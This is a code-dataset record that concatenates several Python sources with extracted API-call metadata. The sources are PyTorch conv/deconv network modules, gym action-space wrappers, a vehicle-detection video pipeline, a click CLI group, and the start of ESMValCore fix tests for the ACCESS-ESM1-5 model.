            H = getattr(self, 'pool'+str(i))(H)
            if self.dp == 1:
                H = getattr(self, 'dp'+str(i))(H)
            # if i == self.layer_num - 1:
            #     print(H.data[0, :, H.size(2)//2, H.size(3)//2].reshape(1, -1))
            H = self.tranform(H)
            # if i == self.layer_num - 1:
            #     print(H.data[0, :, H.size(2)//2, H.size(3)//2].reshape(1, -1))
        return H
class DeConv(nn.Module):
    """Decoder stack of (upsample) -> conv -> (BatchNorm) -> (Dropout) -> ReLU
    layers, with an optional output transformation on the final layer.

    Args:
        scales: per-layer nearest-neighbour upsampling factors (1 disables).
        conv_features: channel counts per layer, length layer_num + 1.
        conv_kernels: per-layer kernel sizes.
        conv_paddings: per-layer paddings.
        out_trans: name of the output activation ('tanh', 'relu', 'sigmoid',
            'softmax') or None for a linear output.
        bn: 1 to insert BatchNorm2d after each convolution.
        dp: 1 to insert Dropout2d(0.2) after each convolution.

    Layers are registered via setattr ('unpool0', 'conv0', ...), so the
    state-dict key layout depends on these exact names.
    """
    def __init__(self, scales, conv_features, conv_kernels, conv_paddings, out_trans=None, bn=0, dp=0):
        super(DeConv, self).__init__()
        self.layer_num = len(conv_features) - 1
        self.scales = scales
        assert self.layer_num == len(scales) == len(conv_kernels) == len(conv_paddings) > 0, \
            'Invalid deconv parameters'
        self.bn = bn
        self.dp = dp
        # Convolutional block
        for i in range(0, self.layer_num):
            if scales[i] > 1:
                setattr(self, 'unpool'+str(i), nn.Upsample(scale_factor=scales[i], mode='nearest'))
            setattr(self, 'conv'+str(i), nn.Conv2d(conv_features[i], conv_features[i+1], conv_kernels[i],
                    stride=1, padding=tuple(conv_paddings[i])))
            if bn == 1:
                setattr(self, 'bn'+str(i), nn.BatchNorm2d(conv_features[i+1]))
            if dp == 1:
                setattr(self, 'dp'+str(i), nn.Dropout2d(0.2))
        # Transformations
        self.transform = func('relu')
        self.out_trans_func = func(out_trans)

    def forward(self, X):
        """Apply all layers in order; X is an N * D * H * W batch."""
        H = X  # N * D * H * W
        # Hidden layers
        for i in range(0, self.layer_num):
            if self.scales[i] > 1:
                H = getattr(self, 'unpool'+str(i))(H)
            H = getattr(self, 'conv'+str(i))(H)
            if self.bn == 1:
                H = getattr(self, 'bn'+str(i))(H)
            if self.dp == 1:
                H = getattr(self, 'dp'+str(i))(H)
            # ReLU on all but the last layer; the last gets out_trans_func.
            if i < self.layer_num - 1:
                H = self.transform(H)
        # Output layer
        if self.out_trans_func is not None:
            H = self.out_trans_func(H)
        return H
class FCN(nn.Module):
def __init__(self, features, hid_trans='tanh', out_trans=None, hid_bn=0, out_bn=0):
super(FCN, self).__init__()
self.layer_num = len(features) - 1
assert self.layer_num > 0, 'Invalid fc parameters'
self.hid_bn = hid_bn
self.out_bn = out_bn
# Linear layers
for i in range(0, self.layer_num):
setattr(self, 'fc'+str(i), nn.Linear(features[i], features[i+1]))
if hid_bn == 1:
setattr(self, 'hid_bn_func'+str(i), nn.BatchNorm1d(features[i+1]))
if out_bn == 1:
self.out_bn_func = nn.BatchNorm1d(features[-1])
# Transformations
self.hid_trans_func = func(hid_trans)
self.out_trans_func = func(out_trans)
def forward(self, X):
H = X
# Hidden layers
for i in range(0, self.layer_num):
H = getattr(self, 'fc'+str(i))(H)
if i < self.layer_num - 1:
if self.hid_bn == 1:
H = getattr(self, 'hid_bn_func'+str(i))(H)
H = self.hid_trans_func(H)
# Output layer
if self.out_bn == 1:
H = self.out_bn_func(H)
if self.out_trans_func is not None:
H = self.out_trans_func(H)
return H
class CNN(nn.Module):
def __init__(self, params):
super(CNN, self).__init__()
self.conv = Conv(params['conv_features'], params['conv_kernels'], params['out_sizes'],
bn=params['bn'])
self.fcn = FCN(params['fc_features'], hid_trans='relu', out_trans=params['out_trans'],
hid_bn=params['bn'], out_bn=params['bn'])
def forward(self, X):
# X: N * D * H * W
# Conv
H = self.conv(X) # N * D_out1 * H_out1 * W_out1
# H = CheckBP('H_Conv')(H)
# FCN
H = H.view(H.size(0), -1) # N * (D_out1 * H_out1 * W_out1)
H = self.fcn(H) # N * D_out2
return H
class DCN(nn.Module):
def __init__(self, params):
super(DCN, self).__init__()
self.fcn = FCN(params['fc_features'], hid_trans='relu', out_trans='relu', hid_bn=params['bn'],
out_bn=params['bn'])
self.deconv = DeConv(params['scales'], params['conv_features'], params['conv_kernels'],
params['conv_paddings'], out_trans=params['out_trans'], bn=params['bn'])
self.H_in, self.W_in = params['H_in'], params['W_in']
def forward(self, X):
# X: N * D
# FCN
H = self.fcn(X) # N * (D_out1 * H_out1 * W_out1)
# Deconv
H = H.view(H.size(0), -1, self.H_in, self.W_in) # N * D_out1 * H_out1 * W_out1
H = self.deconv(H) # N * D_out2 * H_out2 * W_out2
return H
|
[
"functions.submodules.PermutationMatrixCalculator.apply",
"torch.nn.ReLU",
"torch.nn.Dropout2d",
"torch.nn.Tanh",
"functions.submodules.Identity.apply",
"torch.nn.BatchNorm1d",
"torch.nn.Conv2d",
"torch.nn.Linear",
"torch.nn.BatchNorm2d",
"torch.nn.Upsample",
"torch.nn.Softmax",
"functions.submodules.CheckBP.apply",
"functions.submodules.ArgMax.apply",
"functions.submodules.StraightThrough.apply",
"functions.submodules.Round.apply",
"torch.nn.Sigmoid"
] |
[((1378, 1423), 'functions.submodules.CheckBP.apply', 'F.CheckBP.apply', (['input', 'self.label', 'self.show'], {}), '(input, self.label, self.show)\n', (1393, 1423), True, 'import functions.submodules as F\n'), ((1499, 1522), 'functions.submodules.Identity.apply', 'F.Identity.apply', (['input'], {}), '(input)\n', (1515, 1522), True, 'import functions.submodules as F\n'), ((1976, 1996), 'functions.submodules.Round.apply', 'F.Round.apply', (['input'], {}), '(input)\n', (1989, 1996), True, 'import functions.submodules as F\n'), ((2248, 2278), 'functions.submodules.StraightThrough.apply', 'F.StraightThrough.apply', (['input'], {}), '(input)\n', (2271, 2278), True, 'import functions.submodules as F\n'), ((2567, 2588), 'functions.submodules.ArgMax.apply', 'F.ArgMax.apply', (['input'], {}), '(input)\n', (2581, 2588), True, 'import functions.submodules as F\n'), ((3226, 3243), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (3236, 3243), True, 'import torch.nn as nn\n'), ((4165, 4221), 'functions.submodules.PermutationMatrixCalculator.apply', 'F.PermutationMatrixCalculator.apply', (['input', 'self.descend'], {}), '(input, self.descend)\n', (4200, 4221), True, 'import functions.submodules as F\n'), ((923, 932), 'torch.nn.Tanh', 'nn.Tanh', ([], {}), '()\n', (930, 932), True, 'import torch.nn as nn\n'), ((8242, 8270), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['features[-1]'], {}), '(features[-1])\n', (8256, 8270), True, 'import torch.nn as nn\n'), ((978, 987), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (985, 987), True, 'import torch.nn as nn\n'), ((4700, 4870), 'torch.nn.Conv2d', 'nn.Conv2d', (['conv_features[i]', 'conv_features[i + 1]', '(conv_kernels[i][0], conv_kernels[i][1])'], {'stride': '(1)', 'padding': '(conv_kernels[i][0] // 2, conv_kernels[i][1] // 2)'}), '(conv_features[i], conv_features[i + 1], (conv_kernels[i][0],\n conv_kernels[i][1]), stride=1, padding=(conv_kernels[i][0] // 2, \n conv_kernels[i][1] // 2))\n', (4709, 4870), True, 
'import torch.nn as nn\n'), ((8037, 8076), 'torch.nn.Linear', 'nn.Linear', (['features[i]', 'features[i + 1]'], {}), '(features[i], features[i + 1])\n', (8046, 8076), True, 'import torch.nn as nn\n'), ((1036, 1048), 'torch.nn.Sigmoid', 'nn.Sigmoid', ([], {}), '()\n', (1046, 1048), True, 'import torch.nn as nn\n'), ((4956, 4992), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['conv_features[i + 1]'], {}), '(conv_features[i + 1])\n', (4970, 4992), True, 'import torch.nn as nn\n'), ((5143, 5160), 'torch.nn.Dropout2d', 'nn.Dropout2d', (['(0.2)'], {}), '(0.2)\n', (5155, 5160), True, 'import torch.nn as nn\n'), ((6450, 6501), 'torch.nn.Upsample', 'nn.Upsample', ([], {'scale_factor': 'scales[i]', 'mode': '"""nearest"""'}), "(scale_factor=scales[i], mode='nearest')\n", (6461, 6501), True, 'import torch.nn as nn\n'), ((6771, 6807), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['conv_features[i + 1]'], {}), '(conv_features[i + 1])\n', (6785, 6807), True, 'import torch.nn as nn\n'), ((6874, 6891), 'torch.nn.Dropout2d', 'nn.Dropout2d', (['(0.2)'], {}), '(0.2)\n', (6886, 6891), True, 'import torch.nn as nn\n'), ((8156, 8187), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['features[i + 1]'], {}), '(features[i + 1])\n', (8170, 8187), True, 'import torch.nn as nn\n'), ((1097, 1114), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (1107, 1114), True, 'import torch.nn as nn\n')]
|
from typing import Union, List
import numpy as np
from gym import spaces, ActionWrapper
from gym.spaces import flatten_space, flatdim, unflatten, flatten
from sorting_gym import DiscreteParametric
def merge_discrete_spaces(input_spaces: List[Union[spaces.Discrete, spaces.Tuple, spaces.MultiBinary]]) -> spaces.MultiDiscrete:
"""
Merge nested Discrete, and MultiBinary spaces into a single MultiDiscrete space
TODO could also add support for MultiDiscrete
:param input_spaces:
:return:
"""
return spaces.MultiDiscrete(_discrete_dims(input_spaces))
def _discrete_dims(input_spaces: Union[spaces.Discrete, spaces.Tuple, spaces.MultiBinary]):
sizes = []
for space in input_spaces:
if isinstance(space, spaces.Discrete):
sizes.append(space.n)
elif isinstance(space, spaces.MultiBinary):
sizes.extend([2 for _ in range(space.n)])
elif isinstance(space, spaces.MultiDiscrete):
sizes.extend(space.nvec)
elif isinstance(space, spaces.Tuple):
sizes.extend(_discrete_dims(space.spaces))
return sizes
def _discrete_unflatten(argument_space, args):
"""
:param argument_space:
:param args:
:return:
"""
res = []
args = list(args)
while len(args) > 0:
if isinstance(argument_space, spaces.Discrete):
res.append(args.pop(0))
elif isinstance(argument_space, spaces.MultiDiscrete):
res.append(args[:argument_space.shape[0]])
del args[:argument_space.shape[0]]
elif isinstance(argument_space, spaces.MultiBinary):
res.append(args[:argument_space.n])
del args[:argument_space.shape[0]]
elif isinstance(argument_space, spaces.Tuple):
_num_tuple_args = _discrete_dims(argument_space.spaces)
res.append(args[:len(_num_tuple_args)])
del args[:len(_num_tuple_args)]
else:
raise NotImplemented
return res
class DisjointMultiDiscreteActionSpaceWrapper(ActionWrapper):
"""Expose a MultiDiscrete action space for each disjoint action space instead of a more complex nested space.
Wrapping a discrete parametric space with the following disjoint spaces:
Discrete(k),
Tuple([Discrete(k), MultiBinary(1)]),
Tuple([Discrete(k), Discrete(k)]),
should result in output spaces of:
MultiDiscrete([k]),
MultiDiscrete([k, 2]),
MultiDiscrete([k, k]
"""
def __init__(self, env):
assert isinstance(env.action_space, DiscreteParametric), (
"expected DiscreteParametric action space, got {}".format(type(env.action_space)))
super(DisjointMultiDiscreteActionSpaceWrapper, self).__init__(env)
self.parametric_space: DiscreteParametric = env.action_space
# Construct the modified disjoint spaces
self.disjoint_action_spaces = [merge_discrete_spaces([s]) for s in self.parametric_space.disjoint_spaces]
self.action_space = DiscreteParametric(env.action_space.parameter_space.n, self.disjoint_action_spaces)
def action(self, action):
"""
Convert an action using the merged MultiDiscrete disjoint space into a DiscreteParametric action.
"""
assert self.action_space.contains(action), "Given action is not valid in this action space"
# Get the discrete parameter value
parameter = action[0]
# The args should be a valid MultiDiscrete sample for the given parameter. Note
# MultiDiscrete samples are ndarrays of dtype np.int64.
args = action[1:]
assert self.disjoint_action_spaces[parameter].contains(np.array(args, dtype=np.int64))
# TODO the args need to be converted back into their original nested form
#
output_space = self.env.action_space.disjoint_spaces[parameter]
raise NotImplemented
assert self.env.action_space.contains(transformed_action)
return tuple(transformed_action)
class MultiDiscreteActionSpaceWrapper(ActionWrapper):
"""Expose a single MultiDiscrete action space instead of a DiscreteParametric action space.
"""
def __init__(self, env):
assert isinstance(env.action_space, DiscreteParametric), ("expected DiscreteParametric action space, got {}".format(type(env.action_space)))
super(MultiDiscreteActionSpaceWrapper, self).__init__(env)
parametric_space: DiscreteParametric = env.action_space
# Construct a space from the parametric space's parameter_space and disjoint spaces
self.action_space = merge_discrete_spaces([parametric_space.parameter_space] + list(parametric_space.disjoint_spaces))
def action(self, action):
"""Convert a MultiDiscrete action into a DiscreteParametric action."""
# Get the discrete parameter value
parameter = np.argmax(action[0])
argument_space = self.env.action_space[parameter]
# Convert the appropriate args for the disjoint space using the parameter
start_index = 1 + len(_discrete_dims(self.env.action_space.disjoint_spaces[:parameter]))
end_index = 1 + len(_discrete_dims(self.env.action_space.disjoint_spaces[:parameter + 1]))
# Our discrete arguments for the disjoint space
args = action[start_index:end_index]
disjoint_args = _discrete_unflatten(argument_space, args)
# Make the final flat tuple
transformed_action = [parameter]
if isinstance(disjoint_args, (tuple, list)):
transformed_action.extend(disjoint_args)
else:
transformed_action.append(disjoint_args)
assert self.env.action_space.contains(transformed_action)
return tuple(transformed_action)
class BoxActionSpaceWrapper(ActionWrapper):
"""Expose a flat Box action space instead of a parametric action space.
Example::
>>> isinstance(BoxActionSpaceWrapper(env).action_space, Box)
True
Note that sampling from a Box is not the same as flattening samples from a richer
subspace. To draw action space samples from a `SimpleActionSpace` call
`SimpleActionSpace.action_space_sample()`
"""
def __init__(self, env):
assert isinstance(env.action_space, DiscreteParametric), ("expected DiscreteParametric action space, got {}".format(type(env.action_space)))
super(BoxActionSpaceWrapper, self).__init__(env)
parametric_space: DiscreteParametric = env.action_space
# Construct a space from the parametric space's parameter_space and disjoint spaces
self.action_space = flatten_space(spaces.Tuple([parametric_space.parameter_space] +
list(parametric_space.disjoint_spaces)))
self.disjoint_sizes = [flatdim(space) for space in parametric_space.disjoint_spaces]
def action(self, action):
"""Convert a flattened action into a parametric space."""
# Get the discrete parameter value
num_disjoint_spaces = len(self.env.action_space)
parameter = np.argmax(action[:num_disjoint_spaces])
argument_space = self.env.action_space[parameter]
# Now we need to index the appropriate args for the disjoint space using the parameter
start_index = num_disjoint_spaces
start_index += sum(self.disjoint_sizes[:parameter])
end_index = start_index + self.disjoint_sizes[parameter]
# Flattened arguments for the disjoint space
args = action[start_index:end_index]
try:
disjoint_args = unflatten(argument_space, args)
except IndexError as e:
# Very likely the args are invalid for the wrapped space e.g. a Discrete(2) getting all zeros.
msg = "Failed to unflatten arguments to wrapped space of " + str(argument_space)
raise ValueError(msg) from e
# Make the final flat tuple
transformed_action = [parameter]
if isinstance(disjoint_args, tuple):
transformed_action.extend(disjoint_args)
else:
transformed_action.append(disjoint_args)
assert self.env.action_space.contains(transformed_action)
return tuple(transformed_action)
def reverse_action(self, action):
"""Convert a wrapped action (e.g. from a DiscreteParametric) into a flattened action"""
parameter = action[0]
result = np.zeros(self.action_space.shape[0], dtype=self.action_space.dtype)
result[parameter] = 1.0
start_index = len(self.env.action_space)
start_index += sum(self.disjoint_sizes[:parameter])
end_index = start_index + self.disjoint_sizes[parameter]
result[start_index:end_index] = flatten(self.env.action_space[parameter], action[1:])
assert self.action_space.contains(result)
return result
def action_space_sample(self):
rich_sample = self.env.action_space.sample()
assert self.env.action_space.contains(rich_sample)
return self.reverse_action(rich_sample)
|
[
"gym.spaces.flatten",
"numpy.argmax",
"numpy.zeros",
"sorting_gym.DiscreteParametric",
"gym.spaces.flatdim",
"numpy.array",
"gym.spaces.unflatten"
] |
[((3029, 3117), 'sorting_gym.DiscreteParametric', 'DiscreteParametric', (['env.action_space.parameter_space.n', 'self.disjoint_action_spaces'], {}), '(env.action_space.parameter_space.n, self.\n disjoint_action_spaces)\n', (3047, 3117), False, 'from sorting_gym import DiscreteParametric\n'), ((4889, 4909), 'numpy.argmax', 'np.argmax', (['action[0]'], {}), '(action[0])\n', (4898, 4909), True, 'import numpy as np\n'), ((7103, 7142), 'numpy.argmax', 'np.argmax', (['action[:num_disjoint_spaces]'], {}), '(action[:num_disjoint_spaces])\n', (7112, 7142), True, 'import numpy as np\n'), ((8443, 8510), 'numpy.zeros', 'np.zeros', (['self.action_space.shape[0]'], {'dtype': 'self.action_space.dtype'}), '(self.action_space.shape[0], dtype=self.action_space.dtype)\n', (8451, 8510), True, 'import numpy as np\n'), ((8757, 8810), 'gym.spaces.flatten', 'flatten', (['self.env.action_space[parameter]', 'action[1:]'], {}), '(self.env.action_space[parameter], action[1:])\n', (8764, 8810), False, 'from gym.spaces import flatten_space, flatdim, unflatten, flatten\n'), ((3689, 3719), 'numpy.array', 'np.array', (['args'], {'dtype': 'np.int64'}), '(args, dtype=np.int64)\n', (3697, 3719), True, 'import numpy as np\n'), ((6824, 6838), 'gym.spaces.flatdim', 'flatdim', (['space'], {}), '(space)\n', (6831, 6838), False, 'from gym.spaces import flatten_space, flatdim, unflatten, flatten\n'), ((7605, 7636), 'gym.spaces.unflatten', 'unflatten', (['argument_space', 'args'], {}), '(argument_space, args)\n', (7614, 7636), False, 'from gym.spaces import flatten_space, flatdim, unflatten, flatten\n')]
|
# import multiply_detections
from hog_window_search import find_cars
from heat import apply_heat
import pickle
import cv2
import glob
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.image as mpimg
dist_pickle = pickle.load(open("output/svc_model.p", "rb"))
# get attributes of our svc object
svc = dist_pickle["svc"]
X_scaler = dist_pickle["scaler"]
orient = dist_pickle["orient"]
pix_per_cell = dist_pickle["pix_per_cell"]
cell_per_block = dist_pickle["cell_per_block"]
colorspace = dist_pickle["colorspace"]
hog_channel = dist_pickle["hog_channel"]
# spatial_size = (32, 32)
# hist_bins = 32
def pipeline(img):
# ystart = 400
# ystop = 656
#
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
bbox_list = []
# out_img, boxes1 = find_cars(img, ystart, ystop, 1,
# svc, X_scaler, orient, pix_per_cell,
# cell_per_block, colorspace)
# out_img, boxes2 = find_cars(img, ystart, ystop, 2,
# svc, X_scaler, orient, pix_per_cell,
# cell_per_block, colorspace)
#
# out_img, boxes4 = find_cars(img, ystart, ystop, 4,
# svc, X_scaler, orient, pix_per_cell,
# cell_per_block, colorspace)
# out_img, boxes4 = find_cars(img, ystart, ystop, 4,
# svc, X_scaler, orient, pix_per_cell,
# cell_per_block, colorspace)
# for bbox in box_list:
# cv2.rectangle(out_img, bbox[0],
# bbox[1], (0, 0, 255), 6)
# new way:
rectangles = []
ystart = 400
ystop = 464
scale = 1.0
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 416
ystop = 480
scale = 1.0
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 400
ystop = 496
scale = 1.5
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 432
ystop = 528
scale = 1.5
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 400
ystop = 528
scale = 2.0
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 432
ystop = 560
scale = 2.0
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 400
ystop = 596
scale = 3.5
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 464
ystop = 660
scale = 3.5
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
# apparently this is the best way to flatten a list of lists
rectangles = [item for sublist in rectangles for item in sublist]
#Plot rectangles on image
for bbox in rectangles:
cv2.rectangle(img, bbox[0],
bbox[1], (0, 255, 0), 4)
out_img, heatmap, labels = apply_heat(img, rectangles)
return out_img, heatmap, labels
video_path = "project_video.mp4"
# Define the codec and create VideoWriter object
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('output/output2.avi', fourcc, 25.0, (1280, 720), isColor=True)
cap = cv2.VideoCapture(video_path)
cnt = 0
while cap.isOpened():
# for i in range(50):
ret, frame = cap.read()
if ret is True:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = frame.astype(np.float32) / 255
result, heat, labels = pipeline(frame)
# result = cv2.cvtColor(frame, cv2.COLOR_LUV2RGB)
result2 = cv2.cvtColor((result * 255).astype(np.uint8), cv2.COLOR_BGR2RGB)
out.write(result2)
cnt += 1
print(cnt)
else:
break
#
# files = glob.glob("f:/work/sdc/project4/CarND-Vehicle-Detection/output/vlc/*.png")
#
# for file in files:
# img = cv2.imread(file)
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# img = img.astype(np.float32) / 255
# result, heat, labels = pipeline(img)
#
# fig = plt.figure()
# plt.subplot(121)
# plt.imshow(result)
# plt.title('Car Positions')
# plt.subplot(122)
# plt.imshow(heat, cmap='hot')
# plt.title('Heat Map')
# fig.tight_layout()
#
# # plt.imshow(labels[0], cmap='gray')
# # plt.title('Labels')
# # fig.tight_layout()
|
[
"cv2.VideoWriter",
"cv2.VideoWriter_fourcc",
"cv2.cvtColor",
"heat.apply_heat",
"cv2.VideoCapture",
"cv2.rectangle",
"hog_window_search.find_cars"
] |
[((4090, 4121), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'XVID'"], {}), "(*'XVID')\n", (4112, 4121), False, 'import cv2\n'), ((4128, 4206), 'cv2.VideoWriter', 'cv2.VideoWriter', (['"""output/output2.avi"""', 'fourcc', '(25.0)', '(1280, 720)'], {'isColor': '(True)'}), "('output/output2.avi', fourcc, 25.0, (1280, 720), isColor=True)\n", (4143, 4206), False, 'import cv2\n'), ((4214, 4242), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video_path'], {}), '(video_path)\n', (4230, 4242), False, 'import cv2\n'), ((3932, 3959), 'heat.apply_heat', 'apply_heat', (['img', 'rectangles'], {}), '(img, rectangles)\n', (3942, 3959), False, 'from heat import apply_heat\n'), ((1757, 1862), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (1766, 1862), False, 'from hog_window_search import find_cars\n'), ((1999, 2104), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (2008, 2104), False, 'from hog_window_search import find_cars\n'), ((2241, 2346), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (2250, 2346), False, 'from hog_window_search import find_cars\n'), ((2483, 2588), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', 
(2492, 2588), False, 'from hog_window_search import find_cars\n'), ((2725, 2830), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (2734, 2830), False, 'from hog_window_search import find_cars\n'), ((2967, 3072), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (2976, 3072), False, 'from hog_window_search import find_cars\n'), ((3209, 3314), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (3218, 3314), False, 'from hog_window_search import find_cars\n'), ((3451, 3556), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (3460, 3556), False, 'from hog_window_search import find_cars\n'), ((3825, 3877), 'cv2.rectangle', 'cv2.rectangle', (['img', 'bbox[0]', 'bbox[1]', '(0, 255, 0)', '(4)'], {}), '(img, bbox[0], bbox[1], (0, 255, 0), 4)\n', (3838, 3877), False, 'import cv2\n'), ((4359, 4397), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2RGB'], {}), '(frame, cv2.COLOR_BGR2RGB)\n', (4371, 4397), False, 'import cv2\n')]
|
import click
from arrow.commands.remote.add_organism import cli as add_organism
from arrow.commands.remote.add_track import cli as add_track
from arrow.commands.remote.delete_organism import cli as delete_organism
from arrow.commands.remote.delete_track import cli as delete_track
from arrow.commands.remote.update_organism import cli as update_organism
from arrow.commands.remote.update_track import cli as update_track
@click.group()
def cli():
pass
cli.add_command(add_organism)
cli.add_command(add_track)
cli.add_command(delete_organism)
cli.add_command(delete_track)
cli.add_command(update_organism)
cli.add_command(update_track)
|
[
"click.group"
] |
[((424, 437), 'click.group', 'click.group', ([], {}), '()\n', (435, 437), False, 'import click\n')]
|
"""Tests for the fixes of ACCESS-ESM1-5."""
import unittest.mock
import iris
import numpy as np
import pytest
from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg
from esmvalcore.cmor._fixes.common import ClFixHybridHeightCoord
from esmvalcore.cmor.fix import Fix
from esmvalcore.cmor.table import get_var_info
B_POINTS = [
0.99771648645401, 0.990881502628326, 0.979542553424835,
0.9637770652771, 0.943695485591888, 0.919438362121582,
0.891178011894226, 0.859118342399597, 0.823493480682373,
0.784570515155792, 0.742646217346191, 0.698050200939178,
0.651142716407776, 0.602314412593842, 0.55198872089386,
0.500619947910309, 0.44869339466095, 0.39672577381134,
0.34526526927948, 0.294891387224197, 0.24621507525444,
0.199878215789795, 0.156554222106934, 0.116947874426842,
0.0817952379584312, 0.0518637150526047, 0.0279368180781603,
0.0107164792716503, 0.00130179093685001,
0, 0, 0, 0, 0, 0, 0, 0, 0,
]
B_BOUNDS = [
[1, 0.994296252727509],
[0.994296252727509, 0.985203862190247],
[0.985203862190247, 0.971644043922424],
[0.971644043922424, 0.953709840774536],
[0.953709840774536, 0.931527435779572],
[0.931527435779572, 0.905253052711487],
[0.905253052711487, 0.875074565410614],
[0.875074565410614, 0.84121161699295],
[0.84121161699295, 0.80391401052475],
[0.80391401052475, 0.763464510440826],
[0.763464510440826, 0.720175802707672],
[0.720175802707672, 0.674392521381378],
[0.674392521381378, 0.626490533351898],
[0.626490533351898, 0.576877355575562],
[0.576877355575562, 0.525990784168243],
[0.525990784168243, 0.474301367998123],
[0.474301367998123, 0.422309905290604],
[0.422309905290604, 0.370548874139786],
[0.370548874139786, 0.3195820748806],
[0.3195820748806, 0.270004868507385],
[0.270004868507385, 0.222443267703056],
[0.222443267703056, 0.177555426955223],
[0.177555426955223, 0.136030226945877],
[0.136030226945877, 0.0985881090164185],
[0.0985881090164185, 0.0659807845950127],
[0.0659807845950127, 0.0389823913574219],
[0.0389823913574219, 0.0183146875351667],
[0.0183146875351667, 0.00487210927531123],
[0.00487210927531123, 0],
[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0],
[0, 0], [0, 0],
]
@pytest.fixture
def cl_cubes():
"""``cl`` cubes."""
b_coord = iris.coords.AuxCoord(np.zeros_like(B_POINTS),
bounds=np.zeros_like(B_BOUNDS),
var_name='b')
cube = iris.cube.Cube(
np.ones_like(B_POINTS),
var_name='cl',
standard_name='cloud_area_fraction_in_atmosphere_layer',
units='%',
aux_coords_and_dims=[(b_coord, 0)],
)
return iris.cube.CubeList([cube])
def test_get_cl_fix():
"""Test getting of fix."""
fix = Fix.get_fixes('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'cl')
assert fix == [Cl(None)]
@unittest.mock.patch(
'esmvalcore.cmor._fixes.cmip6.access_esm1_5.ClFixHybridHeightCoord.'
'fix_metadata', autospec=True)
def test_cl_fix_metadata(mock_base_fix_metadata, cl_cubes):
"""Test ``fix_metadata`` for ``cl``."""
mock_base_fix_metadata.side_effect = lambda x, y: y
fix = Cl(None)
out_cube = fix.fix_metadata(cl_cubes)[0]
b_coord = out_cube.coord(var_name='b')
np.testing.assert_allclose(b_coord.points, B_POINTS)
np.testing.assert_allclose(b_coord.bounds, B_BOUNDS)
def test_cl_fix():
"""Test fix for ``cl``."""
assert issubclass(Cl, ClFixHybridHeightCoord)
def test_get_cli_fix():
"""Test getting of fix."""
fix = Fix.get_fixes('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'cli')
assert fix == [Cli(None)]
def test_cli_fix():
